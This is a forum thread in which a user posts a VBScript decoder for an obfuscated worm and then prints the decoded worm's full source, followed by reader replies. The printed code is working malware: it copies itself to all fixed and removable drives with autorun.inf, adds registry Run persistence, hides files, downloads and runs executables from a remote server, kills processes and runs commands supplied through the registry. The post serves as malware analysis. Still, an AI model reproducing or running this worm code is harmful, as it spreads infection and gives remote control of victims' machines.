gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr"


'**************The following SourceStr assigns the string which is the content of Decode_7. This is a freeze frame before the virus program is about to expand and execute.
SourceStr=":execute(uc(dyz)):execute(uc(zcx)):function gt():execute(uc(gtz)):end function:function ei(name,wt):execute(uc(eiz)):end function:function df(wh):execute(uc(dfz)):end function:function bf(wh,wt,da):execute(uc(bfz)):end function:function bi(wh):execute(uc(biz)):end function:function rt(wh,li):execute(uc(rtz)):end function:function wr(rna,rda):execute(uc(wrz)):end function:function rr(rna,pa):execute(uc(rrz)):end function:function ar(file,cg):execute(uc(arz)):end function:function dn(loc,web,ris,min):execute(uc(dnz)):end function:function pr(pcs,gs):execute(uc(prz)):end function:function ec(wt):execute(uc(ecz)):end function:function co(wh):execute(uc(coz)):end function:function rs(sw):execute(uc(rsz)):end function:function hi(sw):execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):execute(uc(dwz)):end function:function us(sw):execute(uc(usz)):end function:function cu():execute(uc(cuz)):end function:function km(sw):execute(uc(kmz)):end function:function cf(wh):execute(uc(cfz)):end function"
'**************The above SourceStr assigns the string which comes from the result of Decode_7. This is a freeze frame before the virus program is about to expand and execute.


'**************Start organizing and rewriting the function uc(b)
Function uc(b)

'<><><><>The following variable assignments come from the first Decode_4, which is equivalent to the key.
c=vbcrlf:d=127:f=11:j=12:h=14:m=31:r=83:k=1:n=8:s=114:u=-5:v=5
i="if a=":t=" then ":e="elseif a>=":a=" and a<=":g="a=a+":o=t&c&g:p=c&e:q=c&i
'<><><><>Must be placed inside the function, otherwise it will be mistakenly modified by the process outside the function. Remember!

execute(l&"for ii=1 to len(b):a=asc(mid(b,ii,1))"&q&"d"&t&"a=13"&q&"f"&t&"a=10"&q&"j"&t&c&"a=34"&c&e&"h"&a&"m"&o&"r"&p&"k"&a&"n"&o&"s"&p&"53"&a&"57"&o&"u"&p&"48"&a&"52"&o&"v"&c&"end if"&c&"uc=uc+chr(a)"&c&"next"&c&"uc=rn+c+uc")
End Function
'**************Organizing and rewriting the function uc(b) ends


'**************The following starts restoring the pathogen program
ForAppending=8
Create=True
ASCII=0
OutPutFile="Virus.txt" ' Output file name
Decode="" ' The decoded text is stored here each time
WhichOne="" ' Show which uc(…) has just been decoded

Set objWSH=CreateObject("WScript.Shell")
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.OpenTextFile(OutPutFile,ForAppending,Create,ASCII)

objTXT.Write Title
AddBlankLine=True ' Determine whether to add 2 blank lines for readability

SourceArr=Split(SourceStr,":")
For LineNum=0 To UBound(SourceArr)
If InStr(1,SourceArr(LineNum),"execute",1)=1 Then
WhichOne=Mid(SourceArr(LineNum),Instr(1,SourceArr(LineNum),"uc",1),InStrRev(SourceArr(LineNum),")",-1,1)-Instr(1,SourceArr(LineNum),"uc",1)) ' Get the name of uc(...), just for easy observation. Here, it's a rough interception of the string. The method is definitely not as convenient as using regular expressions, just make do with it.
Execute(Replace(SourceArr(LineNum),"execute","Intercept")) ' The key here is to use Intercept to substitute the virus's execute function, and then execution will only decode but not run
If AddBlankLine AND True Then ' Judge whether to add blank lines
objTXT.WriteBlankLines 2
End If
AddBlankLine=True ' It's recommended to add blank lines before and after execute, of course, whether to add specific ones depends on what follows
objTXT.WriteLine Decode
End If
If InStr(1,SourceArr(LineNum),"function",1)=1 Then
objTXT.WriteBlankLines 2
AddBlankLine=False ' Add before but not after function
objTXT.WriteLine SourceArr(LineNum)
End If
If InStr(1,SourceArr(LineNum),"end",1)=1 Then
AddBlankLine=True ' Add before but not after end function
objTXT.WriteLine SourceArr(LineNum)
End If
Next

objTXT.Close
objWSH.Run OutPutFile
WScript.Quit

'**************Print the document header
Function Title()
Title="'" & String(40,"=") & vbCrLf
Title=Title & "'|" & Space(38) & "|" & vbCrLf
Title=Title & "'|" & Space(12) & "Virus Source Code" & Space(12) & "|" & vbCrLf
Title=Title & "'|" & Space(38) & "|" & vbCrLf
Title=Title & "'" & String(40,"=") & vbCrLf
End Function

'**************Intercept the code inside execute(), that is, the return value of uc(b)
Function Intercept(ByRef code)
Decode=code ' Transfer the decoded code to the Decode variable
objWSH.PopUp Decode,5,WhichOne & " decoding result, closes automatically after 5 seconds",64 ' Display the decoding result of each uc(...) and close automatically. You can comment out this line with ' in front if you find it annoying
End Function


I don't know why I can't upload the attachment. Just copy the above code, save it as, for example, uncover.vbs, and then run it. Please rest assured that it won't trigger a virus. This is also the reason why this post was just published, because I don't want to do things like recall. ^_^

The result is saved in virus.txt, which is the source program of the virus. Oh no, wait a minute, I forgot. In the sixth pot earlier, there is a function that looks like an error handling function in Decode_6. I checked the plaintext of the virus and found that it uses that error handling function several times, which is quite strange. So the final result also needs to add that error handling function function er(sco) to Virus.txt. Therefore, the complete result is:

'========================================
'| |
'| Virus Source Code |
'| |
'========================================


dim d:j="\":on error resume next
ver="9":btj=700:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":til="UT "&ver:inf="\autorun.inf"
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna=rr(cnp,0):if cna="" then cna=til
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc="0dwuEpE":he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
hip="HKCU"&rop&"advanced\showsuperhidden":hb="vv1<=676x"&chr(124)&"r;"
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif cc<>86 then hd="p"+hc:else hd="$"+hc:end if


dim d:j="\":on error resume next
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("Happy Newyear!"):km 1
if sys then
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",btj
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if


function gt()
dim d:j="\":on error resume next
tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)
wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1
if date-cdate(djs)>4 then gq=true:ws.run "net start ""task scheduler""",0,false
if (rr("tjs",1)>800 or wb or gq or not sys) and rr("ded",1)<>cstr(date) then
id=rr("idd",1):if wb then id=1:js=1:cd=0
do while cd<>"<script>"
if js=2 or js=4 then
d2=dn(mir&til,ht+ha+ec(hd)&id,0,100):cd=rt(mir&til,1)
elseif js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+ec(hd)&id&"&v="&ver,0,100):cd=rt(mir&til,1)
end if:js=js+1:wz=d1=1 or d2=1:if js>4 then
if wz then gt=1
exit do
end if
if wz then er -1
loop
if ei(mir&til,1) then
set r=fso.opentextfile(mir&til,1)
cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline
nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline
r.close:df mir&til:if cin="<script>" then
wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw
if nve-ver>=1 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit
if dis=1 and sys then
if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000
end if
end if
end if
end if
if er(1) or wb then gt=1
end function


function ei(name,wt)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
end function


function df(wh)
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
end function


function bf(wh,wt,da)
dim d:j="\":on error resume next
df wh:set bin=fso.createtextfile(wh,true):bin.writeline wt:bin.close
if da=1 then ar wh,7
if not er(0) then bf=1
end function


function bi(wh)
dim d:j="\":on error resume next
df wh:set i=fso.createtextfile(wh,true):h=vbcrlf
i.writeline til&h&""&h&"open=wscript.exe .\"&vs&h&"shell\open\command=wscript.exe .\"&vs&h&"shell\open\default=1"
i.close:ar wh,7:if not er(0) then bi=1
end function


function rt(wh,li)
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
end function


function wr(rna,rda)
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
end function


function rr(rna,pa)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
end function


function ar(file,cg)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
end function


function dn(loc,web,ris,min)
dim d:j="\":on error resume next
ar loc,0:set xpost = createobject("microsoft.xmlhttp"):xpost.open "get",web,0:xpost.send()
if min<>0 then
if not er(0) then
dn=1:set sget=createobject("adodb.stream")
sget.mode=3:sget.type=1:sget.open():sget.write(xpost.responsebody):sget.savetofile loc,2
ar loc,7
if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0
if fsz>min then
if ris=1 then ws.run loc
else
dn=0:df loc
end if
end if
end if
end function


function pr(pcs,gs)
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
end function


function ec(wt)
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
end function


function co(wh)
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
end function


function rs(sw)
dim d:j="\":on error resume next
if sw=1 and rr(rsp&rsn,0)<>ve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
end function


function hi(sw)
dim d:j="\":on error resume next
if sw=1 then ws.regwrite hip,"0","REG_DWORD"
if sw=0 then hi=rr(hip,0)
end function


function gi(ids,fid,eid,fname,furl)
dim d:j="\":on error resume next
id=rr("idd",1)
do while fid<=eid:idc=idc&","&fid:fid=fid+1:loop
ids=ids&idc:idss=split(ids,",")
for i=0 to ubound(idss)
if id=idss(i) then if not ei(tmp&fname,1) then dn tmp&fname,ht&furl,0,2000
next
if ei(tmp&fname,1) then ws.run tmp&fname
gi=1
end function


function dw(pcs,fn,furl,kill)
dim d:j="\":on error resume next
if rr("ged",1)<>fn and pr(pcs,1)=1 then
if dn(tmp&fn,ht&furl,0,2000)=1 then dwc=1
if ei(tmp&fn,1) and dwc=1 then
if kill=1 then pr pcs,-1
ws.run tmp&fn
if not er(0) then wr "ged",fn:dn 0,ht+ec(hb)+he+fn,0,0:if kill=2 then pr pcs,-1:km 1
end if
dw=1
end if
wscript.sleep 100
end function


function us(sw)
dim d:j="\":on error resume next
for each d in dc
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
if sw=1 then
if ei(d&inf,2) then df d&inf
if ei(d&j&vs,1) and ei(d&inf,1) then
if rt(d&inf,1)<>til then bi d&inf
else
hi 1:bi d&inf:co d&j&vs
end if
elseif sw=-1 then:df d&inf:df d&j&vs
else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),1:df d&inf
end if
end if
next
end function


function cu()
dim d:j="\":on error resume next
cus=rr("osw",1)<>4
do
dcu=rr("tgs",1)<>cstr(date)
if (second(time) mod 3)=0 then
if dcu and cus then us 1
min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt:km 0
if rr("tsw",1)=1 then execute(uc(rr("tco",1)))
end if
wscript.sleep 900
if hi(0)=1 and dcu then wr "tgs",date:us -1
if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:hi 1:wscript.quit
loop
end function


function km(sw)
dim d:j="\":on error resume next
if sw=1 then
rs 0:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit
else
rs 1
if cf(dir&ve) then co dir&ve
if cf(win&ve) then co win&ve
end if
end function


function cf(wh)
dim d:j="\":on error resume next
if rt(wh,1)<>"'"&ver then cf=true
end function


function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function



If any expert is interested, please analyze it for us. I've done the previous work, and now it's your turn to show off?
Oh, I forgot to say, thank you to all the experts, viewers, and moderators for your guidance and points. I can't reply one by one, please forgive me. Actually, I'm still asking others' questions over there, and I haven't had time to thank them yet. I'm doing this here to be well-prepared for when someone helps me solve doubts in the future. Okay, everyone, see U in other places, bye-bye!!!
【End of the full text】

[ Last edited by uhnmki on 2008-1-26 at 07:10 AM ]
Recent Ratings for This Post ( 4 in total) Click for details
RaterScoreTime
liuyun20 +1 2008-03-31 14:17
abcd +15 2008-03-31 15:01
everest79 +15 2008-10-07 21:07
Evangel +2 2009-11-13 13:38
Floor 24 Posted 2008-01-23 20:00 ·  中国 广东 广州 电信
luowei14
初级用户
★★
Credits 193
Posts 98
Joined 2007-01-17 11:56
19-year member
UID 76803
Gender Male
Status Offline
这家伙很聪明 什么都没留下
Floor 25 Posted 2008-01-25 21:29 ·  中国 广西 梧州 电信
ct268gh
新手上路
Credits 12
Posts 7
Joined 2006-12-12 08:47
19-year member
UID 73278
Gender Male
Status Offline
uhnmki is really an expert! The layout explanation is very good, I've bookmarked it
Floor 26 Posted 2008-03-05 14:51 ·  中国 广东 深圳 龙岗区 电信
lengxue0624
新手上路
Credits 2
Posts 1
Joined 2008-03-05 14:27
18-year member
UID 112093
Gender Male
Status Offline
Is there no sequel? Who else can talk about the following? Watch a big movie?
Floor 27 Posted 2008-03-31 14:18 ·  中国 河北 廊坊 联通
liuyun20
初级用户
Credits 36
Posts 14
Joined 2007-03-04 03:22
19-year member
UID 80710
Gender Male
Status Offline
PF!!!
Great person...
Floor 28 Posted 2008-10-07 16:28 ·  中国 云南 昆明 移动
holley
新手上路
Credits 12
Posts 11
Joined 2008-05-09 14:58
18-year member
UID 118231
Gender Male
Status Offline
I can only say that perverted people need perverted people to deal with -_-!
Floor 29 Posted 2008-10-07 20:08 ·  中国 广东 韶关 电信
gotocmd
新手上路
Credits 19
Posts 20
Joined 2008-07-03 20:33
17-year member
UID 121064
Gender Male
Status Offline
I more suspect that the one who decrypted is the one who encrypted
Floor 30 Posted 2009-07-28 03:36 ·  中国 广东 东莞 电信
ljhwaoi
新手上路
Credits 6
Posts 5
Joined 2008-07-09 12:16
17-year member
UID 121276
Gender Male
Status Offline
Beginners are dizzy, but it's very interesting!
‹ Prev 1 2 3 Next ›
Printable Version | Subscribe | Add to Favorites
Forum Jump:
[ Contact the Union admin team - 中国DOS联盟 ]

Sponsored by ifanr Inc | © 2001–2023